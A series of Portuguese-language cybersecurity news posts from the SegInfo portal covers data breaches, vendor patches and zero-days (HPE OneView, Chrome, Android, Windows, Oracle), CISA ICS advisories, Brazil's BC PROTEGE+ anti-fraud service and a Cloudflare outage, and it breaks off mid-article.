De acordo com a notificação oficial, informações pessoais e dados de saúde de pacientes podem ter sido comprometidos em decorrência de um ataque ocorrido em 18 de maio de 2025. A intrusão foi detectada apenas no dia 26 do mesmo mês, e a investigação interna levou cerca de sete meses para ser concluída, sendo finalizada em dezembro.

Inicialmente, em julho, a Covenant Health informou ao gabinete do procurador-geral do estado do Maine que aproximadamente 7.800 pessoas haviam sido afetadas. No entanto, em uma atualização enviada à mesma autoridade em 31 de dezembro, a organização revelou que o número real de vítimas chega a 478.188 indivíduos.

Incidentes desse tipo não são incomuns no setor de saúde, que frequentemente registra violações de dados envolvendo centenas de milhares — e, em alguns casos, milhões — de pessoas.

Segundo a Covenant Health, os cibercriminosos tiveram acesso a informações sensíveis, como nome completo, data de nascimento, endereço, número do seguro social (SSN), número de prontuário médico, dados de planos de saúde e informações sobre tratamentos realizados.

O ataque foi reivindicado pelo grupo de ransomware Qilin, que assumiu a autoria da ação em junho de 2025. Os criminosos alegaram ter exfiltrado mais de 1,3 milhão de arquivos, totalizando cerca de 850 GB de dados.

Parte das informações supostamente roubadas já foi divulgada publicamente pelo grupo cibercriminoso, o que indica que nenhum resgate foi pago pela organização até o momento.

Para saber mais, clique aqui.

The post Violação de dados na Covenant Health afeta mais de 478 mil pessoas appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Hewlett Packard Enterprise (HPE) anunciou nesta semana a liberação de correções para uma vulnerabilidade crítica de execução remota de código em seu software de gerenciamento de infraestrutura de TI, o HPE OneView.

Identificada como CVE-2025-37164 e com pontuação máxima de severidade (CVSS 10.0), a falha permite que atacantes não autenticados executem código arbitrário remotamente, o que representa um risco elevado para ambientes corporativos.

O que se sabe sobre a vulnerabilidade

De acordo com o comunicado oficial da HPE, a vulnerabilidade pode ser explorada sem a necessidade de credenciais válidas. Apesar de a empresa não ter confirmado exploração ativa da falha na internet, a recomendação é clara: os clientes devem aplicar as correções o mais rápido possível.

O problema afeta todas as versões do HPE OneView até a 10.20. Para mitigar o risco, a HPE disponibilizou hotfixes específicos e orienta que ambientes que utilizam versões 6.60.xx sejam atualizados primeiro para a versão 7.00 antes da aplicação do patch de segurança. Além disso, reimagens do HPE Synergy Composer também devem ser atualizadas.

Detalhes técnicos apontados pela Rapid7

Embora a HPE não tenha divulgado detalhes técnicos aprofundados sobre a falha, a empresa de segurança Rapid7 compartilhou informações relevantes após analisar a correção:

“Este hotfix aplica uma nova regra HTTP no servidor web do appliance para bloquear o acesso a um endpoint específico da API REST. Esse endpoint é o /rest/id-pools/executeCommand. Uma inspeção inicial do código do appliance indica que esse endpoint pode ser acessado sem autenticação. A Rapid7 avalia, com alto grau de confiança, que este seja o vetor de ataque utilizado para explorar a vulnerabilidade e alcançar a execução remota de código.”

A HPE creditou a descoberta da falha ao pesquisador Nguyen Quoc Khanh.

Onde encontrar as correções

• Os hotfixes de segurança do appliance virtual HPE OneView estão disponíveis no portal oficial de suporte da HPE.
• Já o hotfix de segurança relacionado ao HPE Synergy (CVE) pode ser obtido na página específica do produto.

Outras vulnerabilidades corrigidas pela HPE

Além da falha crítica no OneView, a HPE também publicou correções para três vulnerabilidades adicionais em dependências utilizadas na plataforma HPE Telco Service Activator, voltada para provisionamento e ativação de serviços de telecomunicações.

As falhas são rastreadas como:

• CVE-2025-49146
• CVE-2025-55163
• CVE-2025-7962

Esses problemas afetam componentes amplamente utilizados, como o driver JDBC do PostgreSQL (PgJDBC), o framework de rede Netty e o Jakarta Mail. Segundo a HPE, a exploração dessas vulnerabilidades poderia resultar em bypass de autenticação, negação de serviço (DoS) e injeção CRLF (Carriage Return Line Feed).

Todas as versões do HPE Telco Service Activator até a 10.3.2 são impactadas. As correções foram incluídas na versão 10.3.3 da plataforma. Até o momento, não há indícios de exploração ativa dessas falhas.

Considerações finais

Vulnerabilidades com severidade crítica e exploração sem autenticação reforçam a importância de gestão contínua de patches, monitoramento de ativos e resposta rápida a alertas de segurança. Organizações que utilizam soluções da HPE devem revisar seus ambientes, aplicar as atualizações recomendadas e garantir que boas práticas de segurança estejam sendo seguidas.

Manter a infraestrutura atualizada não é apenas uma recomendação técnica, mas uma medida essencial para a continuidade e a segurança do negócio.

Para saber mais, clique aqui.

The post HPE corrige falha crítica em software de gestão de infraestrutura de TI appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A CISA (Cybersecurity and Infrastructure Security Agency) divulgou recentemente 12 novos avisos de segurança voltados a Sistemas de Controle Industrial (ICS). Os alertas trazem informações atualizadas sobre vulnerabilidades, falhas exploráveis e riscos operacionais que afetam soluções amplamente utilizadas em ambientes industriais, de energia, automação predial e saúde.

Esses avisos são fundamentais para que organizações avaliem sua superfície de ataque, entendam os impactos potenciais e adotem medidas de mitigação adequadas para reduzir riscos cibernéticos.

A seguir, resumimos os principais pontos de cada advisory.

Johnson Controls iSTAR (ICSA-25-345-01)

Resumo do sistema
O Johnson Controls iSTAR é um controlador amplamente utilizado em sistemas de controle de acesso físico e automação predial.

Avaliação de risco
As vulnerabilidades identificadas apresentam risco médio a alto, especialmente em ambientes conectados à rede corporativa ou à internet.

Detalhes técnicos
As falhas envolvem problemas de validação inadequada de entradas e controle de autenticação, que podem permitir acesso não autorizado ou manipulação de funções do sistema.

Mitigações recomendadas

• • Aplicação imediata de patches fornecidos pelo fabricante
• • Restrição de acesso à interface de gerenciamento
• • Segmentação de rede para isolar sistemas de controle de acesso

Johnson Controls iSTAR Ultra (ICSA-25-345-02)

Resumo do sistema
Versão avançada do iSTAR, utilizada em ambientes críticos que exigem maior escalabilidade e integração.

Avaliação de risco
Classificado como alto impacto potencial, pois o sistema é comumente empregado em infraestruturas sensíveis.

Detalhes técnicos
As vulnerabilidades podem permitir execução de comandos não autorizados e comprometimento da integridade do sistema.

Mitigações recomendadas

• • Atualização para versões corrigidas
• • Monitoramento contínuo de logs
• • Desativação de serviços não utilizados

AzeoTech DAQFactory (ICSA-25-345-03)

Resumo do sistema
DAQFactory é um software SCADA/HMI utilizado para aquisição de dados e controle industrial.

Avaliação de risco
Risco médio, com possibilidade de escalonamento dependendo do contexto operacional.

Detalhes técnicos
As falhas envolvem tratamento inadequado de entradas e permissões, podendo levar a falhas de disponibilidade ou execução indevida de ações.

Mitigações recomendadas

• • Atualizar o software
• • Limitar acesso de usuários
• • Executar o sistema em ambientes segregados

Siemens IAM Client (ICSA-25-345-04)

Resumo do sistema
Cliente de gerenciamento de identidade e acesso utilizado em soluções industriais da Siemens.

Avaliação de risco
Risco médio, com impacto direto na gestão de identidades industriais.

Detalhes técnicos
As vulnerabilidades podem permitir bypass de autenticação ou falhas no controle de privilégios.

Mitigações recomendadas

• • Aplicação de correções de segurança
• • Reforço de políticas de acesso
• • Uso de autenticação multifator quando possível

Siemens Advanced Licensing (SALT) Toolkit (ICSA-25-345-05)

Resumo do sistema
Ferramenta responsável pelo gerenciamento de licenças de softwares industriais Siemens.

Avaliação de risco
Risco baixo a médio, com impacto principalmente operacional.

Detalhes técnicos
Falhas podem permitir manipulação de arquivos de licença ou interrupção de serviços associados.

Mitigações recomendadas

• • Atualização do toolkit
• • Restrição de acesso administrativo
• • Backup regular das configurações

Siemens SINEMA Remote Connect Server (ICSA-25-345-06)

Resumo do sistema
Plataforma para acesso remoto seguro a ambientes industriais.

Avaliação de risco
Alto risco, pois envolve conectividade remota a sistemas críticos.

Detalhes técnicos
As vulnerabilidades podem permitir acesso remoto não autorizado ou interceptação de comunicações.

Mitigações recomendadas

• • Atualização imediata
• • Restrição de acesso remoto
• • Uso de VPNs e autenticação forte

Siemens Building X – Security Manager Edge Controller (ICSA-25-345-07)

Resumo do sistema
Controlador utilizado em soluções de segurança e automação predial.

Avaliação de risco
Risco médio, com potencial impacto físico e operacional.

Detalhes técnicos
As falhas afetam mecanismos de autenticação e gerenciamento de sessões.

Mitigações recomendadas

• • Aplicar patches
• • Isolar o controlador da internet
• • Monitorar acessos suspeitos

Siemens Energy Services (ICSA-25-345-08)

Resumo do sistema
Soluções voltadas à gestão e serviços de energia.

Avaliação de risco
Alto impacto, especialmente em ambientes de infraestrutura crítica.

Detalhes técnicos
As vulnerabilidades podem permitir manipulação de dados operacionais ou interrupção de serviços.

Mitigações recomendadas

• • Atualizações de segurança
• • Segmentação de rede
• • Monitoramento contínuo

Siemens Gridscale X Prepay (ICSA-25-345-09)

Resumo do sistema
Sistema utilizado para gestão de energia pré-paga.

Avaliação de risco
Risco médio a alto, com impacto financeiro e operacional.

Detalhes técnicos
As falhas podem permitir alteração indevida de dados de cobrança ou consumo.

Mitigações recomendadas

• • Correção das vulnerabilidades
• • Controles de acesso rigorosos
• • Auditoria de logs

OpenPLC_V3 (ICSA-25-345-10)

Resumo do sistema
OpenPLC é um controlador lógico programável open source, amplamente usado em ambientes educacionais e industriais.

Avaliação de risco
Risco alto em ambientes produtivos expostos à rede.

Detalhes técnicos
Vulnerabilidades incluem falta de autenticação robusta e validação de comandos, possibilitando controle não autorizado.

Mitigações recomendadas

• • Executar apenas em redes isoladas
• • Implementar controles de acesso adicionais
• • Atualizar para versões corrigidas

Grassroots DICOM (GDCM) (ICSMA-25-345-01)

Resumo do sistema
Biblioteca utilizada para manipulação de imagens médicas no padrão DICOM.

Avaliação de risco
Risco médio, especialmente em ambientes hospitalares.

Detalhes técnicos
Falhas podem permitir negação de serviço ou corrupção de dados ao processar arquivos maliciosos.

Mitigações recomendadas

• Atualização da biblioteca
• Validação de arquivos de entrada
• Monitoramento de aplicações dependentes

Varex Imaging – Software de imagem odontológica panorâmica (ICSMA-25-345-02)

Resumo do sistema
Software utilizado para imagens odontológicas panorâmicas.

Avaliação de risco
Risco médio, com impacto na disponibilidade e integridade de exames.

Detalhes técnicos
As vulnerabilidades envolvem falhas no processamento de arquivos e controle de memória.

Mitigações recomendadas

• • Aplicação de patches
• • Restrição de acesso ao sistema
• • Uso de ambientes controlados

Considerações finais

Os alertas divulgados pela CISA reforçam a importância de gestão contínua de vulnerabilidades em ambientes ICS, especialmente em setores como energia, automação predial e saúde. A adoção de boas práticas de segurança, aliada à aplicação rápida de correções e à segmentação de redes, é essencial para reduzir riscos e manter a resiliência operacional.

A Clavis apoia organizações na avaliação de riscos, implementação de controles de segurança e adequação às melhores práticas para ambientes industriais e críticos, fortalecendo a postura de segurança frente às ameaças cibernéticas atuais. Você pode conferir mais sobre IoT no artigo: Clavis, UNIFEI e Claroty: parceria pela cibersegurança em infraestruturas críticas. Saiba mais clicando aqui e entrando em contato com um especialista da Clavis.

Para saber mais, clique aqui.

The post CISA divulga 12 alertas de segurança para sistemas de controle industrial (ICS) appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A atualização de segurança de dezembro de 2025 do Android, liberada pelo Google trouxe correções importantes para os usuários do sistema operacional — incluindo duas falhas zero-day que, segundo a empresa, já estavam sendo exploradas em ataques direcionados.

As vulnerabilidades, identificadas como CVE-2025-48633 e CVE-2025-48572, afetam o componente Framework da plataforma. De acordo com o boletim oficial, uma delas poderia permitir exposição não autorizada de informações, enquanto a outra poderia ser explorada para elevação de privilégios dentro do sistema.

No Android Security Bulletin, o Google afirma:

“Há indícios de que as seguintes vulnerabilidades possam estar sob exploração limitada e direcionada:
• CVE-2025-48633
• CVE-2025-48572”

A empresa não divulgou detalhes técnicos adicionais sobre os dois zero-days, mas confirmou que eles impactam as versões Android 13, 14, 15 e 16. A falta de informações é comum quando há suspeita de exploração ativa — algo que, segundo analistas, pode indicar o uso das falhas por fornecedores de spyware comercial.

A correção dos dois problemas está incluída na primeira parte do pacote mensal, correspondente ao nível de patch 2025-12-01, que reúne ajustes para 51 vulnerabilidades nos componentes Framework e System. Entre elas, destaca-se uma falha crítica no Framework que poderia causar negação remota de serviço (DoS) sem necessidade de privilégios adicionais de execução.

No total, a atualização de dezembro corrige 107 vulnerabilidades. A segunda parte do ciclo, marcada como 2025-12-05, reúne as demais correções e inclui patches para:

• • Kernel do Android
• • Componentes de fornecedores como Arm, Imagination Technologies, MediaTek, Unisoc e Qualcomm

Diferentemente de meses anteriores, não houve correções para o Google Play system update, e os boletins de segurança do Android Automotive OS e Wear OS também não receberam patches neste ciclo.

Dispositivos que tiverem nível de patch 2025-12-05 ou superior passam a contar com todas as correções incluídas na atualização de dezembro e com os ajustes de segurança acumulados de meses anteriores.

The post Google corrige falhas zero-day em atualização de segurança do Android de dezembro de 2025 appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Google lançou em seu patch tuesday a versão Chrome 143 no canal estável, trazendo correções para 13 vulnerabilidades reportadas por pesquisadores externos. A atualização reforça a segurança do navegador, incluindo falhas classificadas como de alta severidade.

Quatro vulnerabilidades graves corrigidas

Entre os problemas corrigidos está uma falha de type confusion no mecanismo V8 JavaScript e WebAssembly, identificada como CVE-2025-13630. O Google recompensou o pesquisador responsável com US$ 11 mil.

Outras três falhas graves também foram tratadas:

• Implementação inadequada no Google Updater (CVE-2025-13631) – recompensa de US$ 3 mil;
• Implementação inadequada no DevTools (CVE-2025-13632);
• Vulnerabilidade de use-after-free em Digital Credentials (CVE-2025-13633).

Falhas de severidade média e baixa

A atualização do Chrome 143 também endereça:

• Três vulnerabilidades de severidade média:
  • Implementação inadequada em Downloads;
  • Bad cast em Loader;
  • Race condition no V8.
• Seis vulnerabilidades de baixo impacto, incluindo falhas de implementação em Downloads, Split View, WebRTC e Passwords, além de um use-after-free em Media Stream.

Ao todo, o Google afirma ter pago US$ 18 mil em recompensas para quatro das vulnerabilidades já divulgadas, enquanto valores referentes a outras seis ainda não foram informados.

A empresa não relatou evidências de exploração ativa dessas falhas.

Atualizações para desktop e mobile

A versão mais recente do navegador já está sendo distribuída:

• Chrome 143.0.7499.40 para Linux;
• Chrome 143.0.7499.40/41 para Windows e macOS;
• Chrome 143.0.7499.52 para Android;
• Chrome 143.0.7499.92 para iOS.

O Google também atualizou o canal Extended Stable, agora na versão 142.0.7499.226 para Windows e macOS.

Atualize o Chrome o quanto antes

O Google reforça a recomendação para que todos os usuários apliquem as novas atualizações imediatamente. Vulnerabilidades no Chrome costumam ser rapidamente exploradas por agentes mal-intencionados, tornando essencial manter o navegador sempre atualizado.

The post Chrome 143 corrige vulnerabilidades graves em nova atualização appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O avanço dos golpes digitais no Brasil, especialmente aqueles ligados à abertura indevida de contas e ao uso fraudulento do Pix, tem pressionado o sistema financeiro a criar mecanismos mais robustos de proteção. 

Não é incomum ver casos de quadrilhas abrindo contas falsas no nome de terceiros para movimentar valores ilícitos, golpes envolvendo empréstimos feitos sem autorização e até situações em que fraudadores sequestravam identidades digitais completas usando dados vazados na internet.

Diante desse cenário, o Banco Central lançou o BC PROTEGE+, um recurso gratuito que funciona como uma barreira ativa contra a criação de contas fraudulentas. Ele vale tanto para pessoas físicas quanto para empresas.

A seguir, explicamos como funciona, por que ele é importante e como ativá-lo com segurança.

O que é o BC PROTEGE+?

O BC PROTEGE+ é um serviço oficial do Banco Central que permite comunicar ao sistema financeiro que você não deseja abrir novas contas, nem ser incluído como titular ou representante em contas de terceiros.

Antes de abrir qualquer conta, bancos e instituições financeiras são obrigados a consultar essa base. Se a proteção estiver ativada, a instituição é impedida de concluir a abertura até que você desative manualmente.

A medida representa uma camada extra de proteção contra fraudes de identidade, especialmente relevantes no cenário atual, em que criminosos usam:

• • Dados vazados;
• • Engenharia social;
• • SIM swap;
• • Documentos falsificados com auxílio de IA.
  

Esse mecanismo impede, por exemplo, que golpistas abram contas para movimentar valores de golpes do Pix, um tipo de fraude que teve grande repercussão no país nos últimos anos.

Por que o BC PROTEGE+ é importante?

O BC PROTEGE+ neutraliza um dos caminhos mais usados por criminosos: a abertura silenciosa de contas para capturar Pix, solicitar crédito ou viabilizar movimentações ilícitas sem que o titular legítimo perceba.

O serviço é útil para qualquer pessoa ou empresa, mas se torna ainda mais relevante em situações como:

• • Risco de roubo ou extravio de documentos;
• • Vazamento de dados pessoais;
• • Perda de celular contendo informações sensíveis;
• • Tentativas de golpe envolvendo autenticação via SMS ou WhatsApp;
• • Casos em que empresas tiveram informações corporativas comprometidas.
  

Como ativar a proteção?

O processo é simples, rápido e gratuito. Basta seguir estas etapas:

1. Acesse o Meu BC com sua conta gov.br (nível Prata ou Ouro), com autenticação em dois fatores.
2. Dentro do painel, escolha o serviço BC PROTEGE+.
3. Ative a proteção com um único clique.
4. Se quiser, defina uma data de reativação automática.
   

Para empresas, colaboradores cadastrados pelo representante legal no gov.br também podem ativar e desativar a proteção da organização.

A ativação é imediata e o histórico fica registrado, com possibilidade de consulta ou impressão.

Quando desativar a proteção?

O BC PROTEGE+ deve ser desativado apenas quando você quiser abrir uma nova conta bancária, for ser incluído como representante em conta de outra pessoa ou empresa ou precisar atualizar cadastro em uma instituição que exige a revalidação por abertura.

Ao desativar, é possível escolher um período máximo de até 30 dias ou um prazo determinado.

Um reforço necessário frente à evolução das fraudes

A abertura ilícita de contas é um vetor comum em golpes envolvendo Pix. Em muitos casos famosos, criminosos exploraram identidades de terceiros para criar contas “descartáveis”, movimentar valores em minutos e dificultar o rastreio.

O BC PROTEGE+ surge justamente para neutralizar esse tipo de ataque e, quando combinado com boas práticas de segurança, como MFA, senhas fortes e monitoramento de vazamento de credenciais, ajuda a reduzir consideravelmente o risco de exposição.

Um passo importante para proteger sua identidade e seu negócio

Esse recurso marca um avanço significativo na proteção contra fraudes de identidade no Brasil. É simples, acessível, gratuito e funciona tanto para pessoas físicas quanto para empresas.

Para quem já atua com cibersegurança, fica claro que o Banco Central está criando mecanismos estruturais para fortalecer o ecossistema financeiro e cabe ao usuário complementar essa proteção com boas práticas digitais.

The post BC PROTEGE+: a nova camada de segurança do Banco Central appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Uma nova análise a mais de cem milhões de domínios recém-criados revela uma evolução significativa nas técnicas utilizadas em ciberataques, incluindo tunelização DNS, exfiltração de dados e outros métodos furtivos que desafiam as soluções de segurança tradicionais.

O relatório DNS Threat Landscape 2025, divulgado pela Infoblox e distribuído em Portugal pela Exclusive Networks, aponta para um avanço expressivo das ameaças impulsionadas por Inteligência Artificial (IA) e para o uso cada vez mais recorrente de plataformas de publicidade online manipuladas para fins maliciosos — um cenário particularmente sensível com a aproximação da Black Friday.

25% dos novos domínios apresentam comportamentos suspeitos

De acordo com o estudo, foram observados mais de 100 milhões de novos domínios ao longo do último ano. Destes, um em cada quatro foi classificado como malicioso ou potencialmente perigoso. A proliferação de domínios descartáveis — criados e eliminados em curtos períodos — tem sido impulsionada por ferramentas baseadas em IA, capazes de gerar padrões variáveis que dificultam a deteção por mecanismos de defesa tradicionais.

Adtech maliciosa cresce como vetor de ataque

O levantamento revela também que 82% das empresas monitorizadas realizaram pedidos DNS que direcionavam para domínios de Adtech maliciosas. Essas plataformas fraudulentas têm sido utilizadas para disseminar conteúdo enganoso, redirecionar utilizadores a páginas de risco e distribuir malware disfarçado de anúncios legítimos.

“Os dados deste ano demonstram como os atacantes tiram partido do DNS e das plataformas de publicidade online para mascarar as suas operações. O uso indevido de IA e de sistemas de distribuição de tráfego (TDS) permite-lhes manipular campanhas legítimas e manter infraestruturas ocultas”, afirma Renée Burton, diretora da Infoblox Threat Intel.

Técnicas avançadas tornam operações criminosas mais difíceis de rastrear

O relatório chama a atenção para a crescente sofisticação das campanhas criminosas, que utilizam desde técnicas de tunelização DNS e exfiltração silenciosa de dados até estruturas de comando e controlo associadas a ferramentas conhecidas, como Cobalt Strike e Silver. A identificação dessas operações depende, cada vez mais, de algoritmos avançados de machine learning.

Com a chegada da Black Friday — período em que aumentam campanhas promocionais e o volume de transações online — o risco de phishing, publicidade enganosa e fraudes baseadas em domínios temporários tende a crescer significativamente.

Para Elizabeth Alves, Sales Director da Exclusive Networks Portugal, o momento exige reforço de medidas defensivas:
“As empresas portuguesas precisam de soluções mais inteligentes e proativas, que combinem IA com inteligência preditiva para travar ameaças antes de chegarem a clientes ou colaboradores.”

Para saber mais, clique aqui.

The post IA e domínios temporários ampliam alerta para novos modelos de phishing e fraudes online appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Uma falha crítica recentemente corrigida no Oracle Identity Manager pode ter sido explorada por cibercriminosos antes da disponibilização do patch, caracterizando um possível ataque zero-day.

A vulnerabilidade, identificada como CVE-2025-61757, foi divulgada na última quinta-feira pela empresa de segurança Searchlight Cyber, responsável pela descoberta e pelo reporte à Oracle. Segundo os pesquisadores, trata-se de uma falha de execução remota de código (RCE) pré-autenticação, classificada como crítica.

Falha combina bypass de autenticação e execução arbitrária de código

De acordo com a Searchlight Cyber, o exploit combina duas fraquezas — um bypass de autenticação e a possibilidade de execução arbitrária de código — permitindo que um invasor obtenha comprometimento total do sistema.

A Oracle confirmou a gravidade da falha e lançou a correção no pacote de atualizações de outubro de 2025, reforçando que ela é facilmente explorável sem necessidade de credenciais.

A empresa de segurança alertou ainda que a exploração pode permitir que atacantes manipulem fluxos de autenticação, elevem privilégios e realizem movimentos laterais dentro da infraestrutura da organização, podendo levar à violação de servidores que processam informações pessoais e credenciais de usuários.

Indícios de exploração antes do patch

O SANS Technology Institute analisou dados de honeypots após a divulgação técnica feita pela Searchlight e encontrou indícios de exploração.

Segundo Johannes Ullrich, diretor do SANS, houve atividades suspeitas entre 30 de agosto e 9 de setembro, semanas antes da liberação do patch pela Oracle. Ele destacou que:

“Foram observados vários endereços IP diferentes realizando varreduras, mas todos utilizavam o mesmo user-agent, o que sugere a possibilidade de um atacante único.”

Apesar disso, Ullrich observou que os honeypots não registraram o corpo das requisições — todas do tipo POST —, o que limita a confirmação completa da exploração.

Os mesmos endereços IP também foram associados a varreduras relacionadas à vulnerabilidade em produtos Liferay (CVE-2025-4581), além de tentativas de exploração do Log4j, indicando um histórico de busca ativa por falhas críticas na internet.

Oracle e Searchlight ainda não comentaram

O portal SecurityWeek informou ter contatado a Oracle para comentários adicionais, mas ainda não obteve resposta. A Searchlight também foi questionada sobre a possibilidade de a atividade identificada pelo SANS estar relacionada aos próprios testes de pesquisa conduzidos pela empresa.

The post Vulnerabilidade crítica no Oracle Identity Manager pode ter sido explorada como zero-day appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Google lançou na segunda-feira (17/11/25) uma atualização emergencial do Chrome 142 para corrigir uma vulnerabilidade que estava sendo explorada ativamente como zero-day.

A falha, catalogada como CVE-2025-13223 e com pontuação CVSS 8.8, foi classificada como de alta severidade e decorre de um problema de type confusion no motor V8, responsável por executar JavaScript e WebAssembly no navegador.

Riscos da vulnerabilidade

Erros de memory safety como esse podem causar comportamentos inesperados no software e abrir caminhos para execução remota de código, travamentos e outras ações maliciosas.
No caso do V8, vulnerabilidades dessa natureza costumam ser exploradas através de páginas HTML especialmente manipuladas, permitindo operações de leitura e escrita remotas na memória.

Em nota oficial, a empresa confirmou que já existe um exploit ativo para a falha, mas não divulgou detalhes técnicos do bug ou de como ele vem sendo utilizado em ataques.

Ligação com spyware comercial

A vulnerabilidade foi reportada no dia 12 de novembro por Clément Lecigne, pesquisador do Google Threat Analysis Group (TAG) — equipe que frequentemente identifica falhas exploradas por fornecedores de spyware comercial.
Pesquisadores do TAG já descobriram diversas vulnerabilidades usadas em campanhas desse tipo, inclusive no próprio Chrome, o que sugere que a CVE-2025-13223 pode ter sido alvo de grupos especializados nesse mercado.

Com essa correção, o Chrome chega ao sétimo zero-day resolvido apenas em 2025. O anterior havia sido corrigido em setembro.

Outras correções incluídas na atualização

O update também resolve a CVE-2025-13224, outro problema de type confusion no motor V8, reportado pelo agente de IA Big Sleep.
A Google não indicou que essa falha tenha sido explorada, mas já elogiou anteriormente o trabalho do Big Sleep na identificação de vulnerabilidades que poderiam ser usadas por cibercriminosos.

Atualização disponível

A nova versão do navegador já está sendo distribuída para todos os usuários:

• • Linux: 142.0.7444.175
• • macOS: 142.0.7444.176
• • Windows: 142.0.7444.175/.176

A recomendação é atualizar o Chrome o quanto antes para garantir proteção contra possíveis explorações dessas falhas.

Para saber mais, clique aqui.

The post Chrome corrige falha zero-day já explorada em ataques na versão 142 appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Diversos serviços online enfrentaram instabilidades nesta terça-feira (18/11), afetando plataformas como ChatGPT, X, Dropbox, Shopify e o jogo League of Legends. A falha também impactou operações digitais de organizações críticas, incluindo o New Jersey Transit, o Departamento de Gerenciamento de Emergências de Nova York e a empresa ferroviária francesa SNCF.

Inicialmente, a Cloudflare informou ter identificado um “pico de tráfego incomum”, o que levou à especulação de que o problema poderia estar relacionado a um possível ataque cibernético. No entanto, o CTO da companhia, Dane Knecht, esclareceu posteriormente que não se tratou de um ataque.

Segundo Knecht, o incidente foi provocado por “um bug latente em um serviço essencial para nossa capacidade de mitigação de bots, que começou a falhar após uma mudança rotineira de configuração”. Esse problema desencadeou uma degradação em larga escala na rede e em outros serviços da empresa.

O executivo classificou o impacto como inaceitável e afirmou que equipes já estão trabalhando para evitar que a falha se repita. “Sei que isso causou transtornos reais hoje”, declarou.

De acordo com a página de status da Cloudflare, a investigação sobre o incidente começou às 11h48 (UTC), e a correção foi aplicada às 14h42 (UTC). Ainda assim, alguns erros continuaram sendo registrados por mais algumas horas.

Knecht informou que a Cloudflare divulgará em breve uma explicação detalhada sobre as causas da falha.

A empresa é responsável por mitigar ataques distribuídos de negação de serviço (DDoS) de grande escala — incluindo alguns recordistas — direcionados a seus clientes. Apesar disso, especialistas apontam que seria necessário um volume significativo de recursos e expertise para que um ator mal-intencionado conseguisse comprometer a própria infraestrutura da Cloudflare. Além disso, não é incomum que grupos de hackers, especialmente hacktivistas, reivindiquem falsamente a autoria de interrupções desse tipo.

Matthew Prince, cofundador e CEO da Cloudflare, também publicou um post com informações adicionais, classificando o episódio como o pior apagão enfrentado pela empresa desde 2019.

Para saber mais, clique aqui.

The post Cloudflare confirma que instabilidade global não foi causada por ataque cibernético appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Microsoft lançou, nesta terça-feira (12), o seu pacote mensal de atualizações de segurança — conhecido como Patch Tuesday — referente a novembro. No total, foram corrigidas 63 vulnerabilidades, incluindo uma falha zero-day que vinha sendo ativamente explorada por cibercriminosos.

Vulnerabilidade zero-day no kernel do Windows

A falha, identificada como CVE-2025-62215, é uma vulnerabilidade de elevação de privilégios no kernel do Windows. Segundo a Microsoft, o problema permitia que um atacante autenticado explorasse uma condição de corrida (race condition) para obter privilégios de SISTEMA, ganhando controle total sobre o dispositivo.

Em nota técnica, a empresa explicou o mecanismo da exploração: “A execução simultânea utilizando recursos partilhados com sincronização inadequada no kernel do Windows permite que um atacante autorizado eleve os seus privilégios localmente”.

Outras falhas corrigidas

Além da vulnerabilidade zero-day, o pacote de novembro também inclui correções para quatro falhas classificadas como críticas, sendo:

• • Duas vulnerabilidades de execução remota de código (RCE);
• • Uma vulnerabilidade de elevação de privilégios;
• • Uma falha de divulgação de informação.

Essas correções fazem parte do esforço contínuo da Microsoft para reforçar a segurança de seus sistemas e mitigar potenciais vetores de ataque explorados em ambientes corporativos e domésticos.

Início do programa ESU para o Windows 10

A atualização de novembro marca ainda a estreia do Extended Security Update (ESU) para o Windows 10. O suporte de segurança gratuito do sistema operacional foi encerrado em 14 de outubro de 2025, e o novo programa oferece atualizações pagas para empresas e usuários que ainda não migraram para o Windows 11.

A Microsoft reforça a recomendação para que os usuários atualizem para o Windows 11 ou adiram ao programa ESU, garantindo assim o recebimento de patches de segurança essenciais e proteção contra novas ameaças.

The post Microsoft corrige falha zero-day explorada no Windows em atualização do Patch Tuesday appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Google lançou, no seu Boletim de Segurança de novembro de 2025, uma atualização que corrige duas vulnerabilidades graves na componente Sistema do Android, uma delas classificada como crítica e potencialmente explorável para execução remota de código.

A principal falha, identificada como CVE-2025-48593, afeta diversas versões do Android Open Source Project (AOSP), da 13 à 16, e permite que um atacante execute código malicioso sem necessidade de privilégios adicionais ou interação do utilizador. Devido à natureza dessa vulnerabilidade, o risco é elevado, podendo resultar em roubo de dados, instalação de ransomware ou até na transformação do dispositivo comprometido em um nó de botnet.

Embora a Google não tenha relatado exploração ativa desta falha em ataques reais, a empresa destaca que o potencial de impacto é severo, dada a quantidade de informações sensíveis processadas pelos dispositivos Android em todo o mundo.

Outra vulnerabilidade corrigida neste ciclo de atualizações é a CVE-2025-48581, que afeta a versão 16 do sistema operativo. De acordo com o NIST (National Institute of Standards and Technology), a falha ocorre na função VerifyNoOverlapInSessions do ficheiro apex.cpp, e pode ser explorada para bloquear atualizações de segurança ou permitir escalação de privilégios locais sem necessidade de permissões adicionais.

Com estas correções, a Google também anunciou uma mudança no formato das atualizações mensais, que passam a ser distribuídas com apenas um nível de correções de segurança, simplificando o processo de atualização para fabricantes e utilizadores finais.

As correções já estão disponíveis para os dispositivos compatíveis, e a recomendação é que todos os utilizadores do Android mantenham o sistema atualizado para garantir a máxima proteção contra possíveis explorações dessas vulnerabilidades.

Para saber mais, clique aqui.

The post Google corrige falha crítica no Android que expõe milhões de usuários appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Google anunciou que, a partir de outubro de 2026, o navegador Chrome passará a usar conexões seguras (HTTPS) por padrão em todos os sites públicos. A mudança tem como objetivo reforçar a segurança dos usuários e reduzir o risco de ataques durante a navegação.

A configuração “Sempre usar conexões seguras” (Always Use Secure Connections) foi introduzida em 2022 como uma opção manual. Desde então, a empresa vem testando sua ativação automática para uma parcela de usuários. Com o lançamento previsto do Chrome 154, o recurso será habilitado por padrão para todos os usuários.

O que muda na prática

